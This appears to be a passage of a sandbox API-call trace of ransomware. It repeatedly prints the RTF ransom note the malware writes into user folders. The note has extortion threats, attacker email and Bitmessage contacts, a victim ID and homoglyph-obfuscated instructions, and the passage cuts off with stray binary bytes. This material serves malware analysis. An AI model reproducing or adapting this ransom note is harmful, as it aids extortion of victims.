\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0292.192] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.193] CloseHandle (hObject=0x2e8) returned 1 [0292.193] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0292.193] GetLastError () returned 0x2 [0292.193] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.193] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 